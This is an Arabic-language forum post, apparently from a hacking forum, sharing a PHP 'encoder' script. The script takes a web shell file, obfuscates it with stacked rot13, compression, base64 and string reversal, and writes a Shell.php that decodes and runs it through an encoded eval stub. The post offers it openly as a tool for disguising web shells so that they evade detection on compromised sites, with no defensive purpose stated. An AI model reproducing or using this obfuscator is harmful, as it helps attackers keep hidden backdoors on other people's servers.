الموضوع: PHP ENCODER
عرض مشاركة واحدة
قديم 04-23-2018, 01:30 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
L3issabaNet
::. Moderators .::
 
الصورة الرمزية L3issabaNet
 

 

 
إحصائية العضو





L3issabaNet غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
L3issabaNet is on a distinguished road

افتراضي PHP ENCODER


السلام عليكم ورحمة الله

سكريبت لتشفير ملفات php

كود:
<?php

        error_reporting(0);
        print "  _      _   _ _______ 
 | |    | \ | |__   __|
 | |    |  \| |  | |   
 | |    | . ` |  | |   
 | |____| |\  |  | |   
 |______|_| \_|  |_|   
";                                print '
[>]-------------------------------------------[<]
[>]             PHP  ENCODER                    [<]
[>]                                           [<]
[>] Coded By    :        L3issabanet          [<]
[>]-------------------------------------------[<]                        
';
                    echo "Usage : php {$argv[0]} shell.txt\n\n\t";
                    
                    if (!file_exists($argv[1])) 
                                    die("$argv[1] n'existe pas !!!!!!!!!!!\n");
                
                    $shell = $argv[1];     
                    $DoppioZedEncode = file_get_contents($shell);
                    $DoppioZedShell= strrev(base64_encode(gzcompress(gzdeflate(gzcompress(gzdeflate(gzcompress(gzdeflate(gzcompress(gzdeflate(str_rot13($DoppioZedEncode)))))))))));
                        $fp=fopen('Shell.php','w');
                                    fwrite($fp, '<?php        
                                    $DoppioZedSecrets1 = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1K\x42rNK85Pz\x63gqLU4mLq\x43\x43\x63lFqe\x61m\x63Snp\x43\x62np6Rq\x41O0sSi3TUHHMM8iLN64IyMnPDEkN0kQ\x431g\x41\x3d";
                                    $An0n_3xPloiTeR = "'.$DoppioZedShell.'";
                                    eval(htmlspecialchars_decode(gzinflate(base64_decode($DoppioZedSecrets1))));
                                    exit;
                                    ?> ');
                                            fclose($fp);
                                
                                
                            echo "Done => shell name Shell.php \n";

?>

بالتوفيق


PHP ENCODER

التوقيع

استغفر الله العضيم

 

   

رد مع اقتباس